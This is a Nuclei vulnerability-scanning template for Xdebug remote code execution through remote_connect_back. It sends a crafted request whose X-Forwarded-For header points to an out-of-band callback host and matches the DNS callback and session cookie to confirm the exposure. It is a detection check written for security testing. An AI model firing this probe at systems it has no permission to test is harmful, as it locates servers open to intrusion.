nuclei-templates/vulnerabilities/php/php-xdebug-rce.yaml

38 lines
1.4 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: php-xdebug-rce
info:
name: Xdebug remote code execution via xdebug.remote_connect_back
author: pwnhxl
severity: high
description: |
The XDebug extension <= v2.6.0 for PHP is designed to expand the debugging capabilities of developers, including the ability to perform remote debugging. A misconfigured server, with xdebug.remote_connect_back enabled, exposed to the internet could allow an unauthenticated remote attacker to trigger a debugging session using any IP via a simple web request. With a remote debugging session established, the attacker effectively has remote code execution (RCE) capabilities with which to establish persistence, exfiltrate data, or launch further attacks against the system or network.
reference:
- https://github.com/vulhub/vulhub/tree/master/php/xdebug-rce
- https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/
- https://paper.seebug.org/397/
- https://github.com/D3Ext/XDEBUG-Exploit
tags: oast,rce,vulhub,php,debug,xdebug
requests:
- raw:
- |
GET /?XDEBUG_SESSION_START={{randstr}} HTTP/1.1
Host: {{Hostname}}
X-Forwarded-For: {{interactsh-url}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: header
words:
- 'Set-Cookie: XDEBUG_SESSION={{randstr}}'
- type: status
status:
- 200